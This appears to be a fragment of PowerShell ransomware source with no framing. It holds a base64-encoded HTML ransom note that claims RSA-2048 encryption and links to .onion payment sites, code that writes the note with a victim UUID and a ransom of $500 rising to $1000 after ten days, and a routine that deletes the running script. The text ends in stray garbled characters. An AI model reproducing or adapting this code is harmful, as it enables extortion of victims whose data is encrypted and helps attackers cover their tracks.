pdGhpbiB5b3VyIGZpbGVzIGhhdmUgYmVlbiBpcnJldm9jYWJseSBjaGFuZ2VkLCB5b3Ugd2lsbCBub3QgYmUgYWJsZSB0byB3b3JrPGJyPiB3aXRoIHRoZW0sIHJlYWQgdGhlbSBvciBzZWUgdGhlbSwgaXQgaXMgdGhlIHNhbWUgdGhpbmcgYXMgbG9zaW5nIHRoZW0gZm9yZXZlciwgYnV0IHdpdGggb3VyIGhlbHAsIHlvdSBjYW4gcmVzdG9yZSB0aGVtLg0KICAgIDwvZm9udD4NCiAgICA8YnI+PGJyPg0KICAgIDxiPjxmb250IGNsYXNzPSJ0dGwiPkhvdyBkaWQgdGhpcyBoYXBwZW4/PC9iPjwvZm9udD4NCiAgICA8YnI+DQogICAgPGZvbnQgc3R5bGU9ImZvbnQtc2l6ZToxM3B4OyI+DQogICAgICBFc3BlY2lhbGx5IGZvciB5b3UsIG9uIG91ciBzZXJ2ZXIgd2FzIGdlbmVyYXRlZCB0aGUgc2VjcmV0IGtleSBwYWlyIFJTQS0yMDQ4IC0gcHVibGljIGFuZCBwcml2YXRlLg0KICAgICAgPGJyPg0KICAgICAgQWxsIHlvdXIgZmlsZXMgd2VyZSBlbmNyeXB0ZWQgd2l0aCB0aGUgcHVibGljIGtleSwgd2hpY2ggaGFzIGJlZW4gdHJhbnNmZXJyZWQgdG8geW91ciBjb21wdXRlciB2aWEgdGhlIEludGVybmV0Lg0KICAgICAgPGJyPg0KICAgICAgRGVjcnlwdGluZyBvZiB5b3VyIGZpbGVzIGlzIG9ubHkgcG9zc2libGUgd2l0aCB0aGUgaGVscCBvZiB0aGUgcHJpdmF0ZSBrZXkgYW5kIGRlY3J5cHQgcHJvZ3JhbSwgd2hpY2ggaXMgb24gb3VyIHNlY3JldCBzZXJ2ZXIuDQogICAgPC9mb250Pg0KICAgIDxicj48YnI+DQogICAgPGI+PGZvbnQgY2xhc3M9InR0bCI+V2hhdCBkbyBJIGRvPzwvYj48L2ZvbnQ+DQogICAgPGJyPg0KICAgIDxmb250IHN0eWxlPSJmb250LXNpemU6MTNweDsiPg0KICAgICAgQWxhcywgaWYgeW91IGRvIG5vdCB0YWtlIHRoZSBuZWNlc3NhcnkgbWVhc3VyZXMgZm9yIHRoZSBzcGVjaWZpZWQgdGltZSB0aGVuIHRoZSBjb25kaXRpb25zIGZvciBvYnRhaW5pbmcgdGhlIHByaXZhdGUga2V5IHdpbGwgYmUgY2hhbmdlZC4NCiAgICAgIDxicj4NCiAgICAgIElmIHlvdSByZWFsbHkgdmFsdWUgeW91ciBkYXRhLCB0aGVuIHdlIHN1Z2dlc3QgeW91IGRvIG5vdCB3YXN0ZSB2YWx1YWJsZSB0aW1lIHNlYXJjaGluZyBmb3Igb3RoZXIgc29sdXRpb25zIGJlY2F1c2UgdGhleSBkbyBub3QgZXhpc3QuDQogICAgPC9mb250Pg0KICAgIDxicj48YnI+DQogICAgPGRpdiBjbGFzcz0idGIiIHN0eWxlPSJjb2xvcjojODgwMDAwOyBmb250LXNpemU6MTNweDsgYm9yZGVyLXdpZHRoOjNweDsiPg0KICAgICAgRm9yIG1vcmUgc3BlY2lmaWMgaW5zdHJ1Y3Rpb25zLCBwbGVhc2UgdmlzaXQgdGhpcyBob21lIHBhZ2U6DQogICAgICA8aHI+DQogICAgICA8Yj4xLjxhIGhyZWY9Imh0dHA6Ly92MmFhaGdjYW42ZWQ1NjRwLm9uaW9uLm51IiB0YXJnZXQ9Il9ibGFuayI+aHR0cDovL3YyYWFoZ2NhbjZlZDU2NHAub25pb24ubnU8L2E+PC9iPg0KICAgICAgPGJyPg0KUGxlYXNlIHNjcm9sbCBiZWxvdyBmb3IgeW91ciAjVVVJRDwvYj4NCiAgICA8L2Rpdj4NCiAgICA8YnI+DQogICAgPGRpdiBjbGFzcz0idGIiIHN0eWxlPSJmb250LXNpemU6MTNweDsgYm9yZGVyLWNvbG9yOiM4ODAwMDA7Ij4NCiAgICAgIElmIGZvciBzb21lIHJlYXNvbnMgdGhlIGFkZHJlc3MgaXMgbm90IGF2YWlsYWJsZSwgZm9sbG93IHRoZXNlIHN0ZXBzOiA8aHI+DQogICAgICAxLiBEb3dubG9hZCBhbmQgaW5zdGFsbCB0b3ItYnJvd3NlcjogPGEgaHJlZj0iaHR0cDovL3d3dy50b3Jwcm9qZWN0Lm9yZy9wcm9qZWN0cy90b3Jicm93c2VyLmh0bWwuZW4iIHRhcmdldD0iX2JsYW5rIj5odHRwOi8vd3d3LnRvcnByb2plY3Qub3JnL3Byb2plY3RzL3RvcmJyb3dzZXIuaHRtbC5lbjwvYT48YnI+DQogICAgICAyLiBBZnRlciBhIHN1Y2Nlc3NmdWwgaW5zdGFsbGF0aW9uLCBydW4gdGhlIGJyb3dzZXIgYW5kIHdhaXQgZm9yIGluaXRpYWxpemF0aW9uLjxicj4NCiAgICAgIDMuIFR5cGUgaW4gdGhlIGFkZHJlc3MgYmFyOiA8Zm9udCBzdHlsZT0iZm9udC13ZWlnaHQ6Ym9sZDsgY29sb3I6IzAwOTk3NzsiPnYyYWFoZ2NhbjZlZDU2NHAub25pb248L2ZvbnQ+PGJyPg0KICAgICAgNC4gRm9sbG93IHRoZSBpbnN0cnVjdGlvbnMgb24gdGhlIHNpdGUuDQogICAgPC9kaXY+DQogICAgPGJyPg0KICAgIDxicj4NCiAgICA8Yj5JTVBPUlRBTlQgSU5GT1JNQVRJT046PC9iPjxicj4NCiAgICA8ZGl2IGNsYXNzPSJ0YiIgc3R5bGU9IndpZHRoOjc5MHB4OyI+DQogICAgICBZb3VyIEhvbWUgUEFHRTogPGI+PGEgaHJlZj0iaHR0cDovL3YyYWFoZ2NhbjZlZDU2NHAub25pb24ubnUiIHRhcmdldD0iX2JsYW5rIj5odHRwOi8vdjJhYWhnY2FuNmVkNTY0cC5vbmlvbi5udTwvYT48L2I+PGJyPg0KICAgICAgWW91ciBIb21lIFBBR0UodXNpbmcgVE9SKTogPGZvbnQgc3R5bGU9ImZvbnQtd2VpZ2h0OmJvbGQ7IGNvbG9yOiMwMDk5Nzc7Ij4zYWZkNTdjNGRjaHpwM3BlLm9uaW9uPC9mb250Pjxicj4NCiAgICAgIDxiPlBsZWFzZSBzY3JvbGwgYmVsb3cgZm9yIHlvdXIgI1VVSUQ8L2I+PGJyPg0KICAgIDwvZGl2Pg0KICA8L2Rpdj4NCiAgPC9jZW50ZXI+DQo8L2JvZHk+DQo8L2h0bWw+"));
	if(!(Test-path($XJJYHNBVDDGHJJJ))){
	New-Item -Path $XJJYHNBVDDGHJJJ -ItemType file -Value $Kjnx69456GFjjsRyh
	Add-Content -Path $XJJYHNBVDDGHJJJ -Value ("<p><h2>Your #UUID is $WKJYGBVDRHJJSDGHXWH</p></h2>")
	Add-Content -Path $XJJYHNBVDDGHJJJ -Value ('<p><h2>The price to obtain the decrypter goes from 500 $ to 1000 $ on the day of '+(Get-Date).AddDays(+10))
	}}
	catch
	{

	}
	}}
	function FHNVXETJJHDSDF() {
	$XSJKTGshdgRFHOOFDGH = (Get-Variable MyInvocation -Scope 1).Value
	$VBIOJHFRRHJNHGFG = $XSJKTGshdgRFHOOFDGH.MyCommand.Path
	Remove-Item $VBIOJHFRRHJNHGFG
	}
	FHNVXETJJHDSDF㐲ㄴ